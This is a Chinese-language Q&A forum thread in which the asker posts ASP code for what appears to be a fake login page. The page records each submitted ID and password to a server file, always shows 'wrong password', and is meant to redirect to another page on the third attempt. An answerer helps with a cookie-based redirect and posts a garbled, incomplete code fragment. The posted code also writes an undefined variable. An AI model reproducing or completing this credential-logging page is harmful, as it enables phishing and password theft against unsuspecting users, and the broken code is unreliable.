请问ASP打开2次后,跳转到另一个页面
请问ASP打开2次后,跳转到另一个页面<%Response.Buffer=Truecccid=Request.Form("cccId")password=Request....
请问ASP打开2次后,跳转到另一个页面
<%
Response.Buffer=True
cccid=Request.Form("cccId")
password=Request.Form("cccPassword")
testfile=Server.MapPath("id.txt")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(appid)
thisfile.WriteLine(password)
thisfile.close
set fs = nothing
%>
<script>alert('密码错误');window.location.href='deng.htm'</script>");
要求同1个人,打开 弹出(密码错误)窗口 2次后 第3次打开转向另外一个页面qwe.html
每个人打开2次都是弹出 密码错误,,,第三次自动转向为qwe.html页面
请问代码怎么写 展开
<%
Response.Buffer=True
cccid=Request.Form("cccId")
password=Request.Form("cccPassword")
testfile=Server.MapPath("id.txt")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(appid)
thisfile.WriteLine(password)
thisfile.close
set fs = nothing
%>
<script>alert('密码错误');window.location.href='deng.htm'</script>");
要求同1个人,打开 弹出(密码错误)窗口 2次后 第3次打开转向另外一个页面qwe.html
每个人打开2次都是弹出 密码错误,,,第三次自动转向为qwe.html页面
请问代码怎么写 展开
1个回答
展开全部
以来访ip为参数做一个cookie
第一次为空
第二次赋值
第三次跳转
第一次为空
第二次赋值
第三次跳转
追问
怎么写啊 代码
追答
alert('密码错误1!');location.href='deng.htm';"
response.End
else
response.Cookies("x")=x+1
if request.cookies("x")=x+2 then
response.Redirect "qwe.html"
response.End
else
response.Cookies("x")=x+2
response.Redirect "qwe.html"
response.End
end if
end if
%>
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
推荐律师服务:
若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询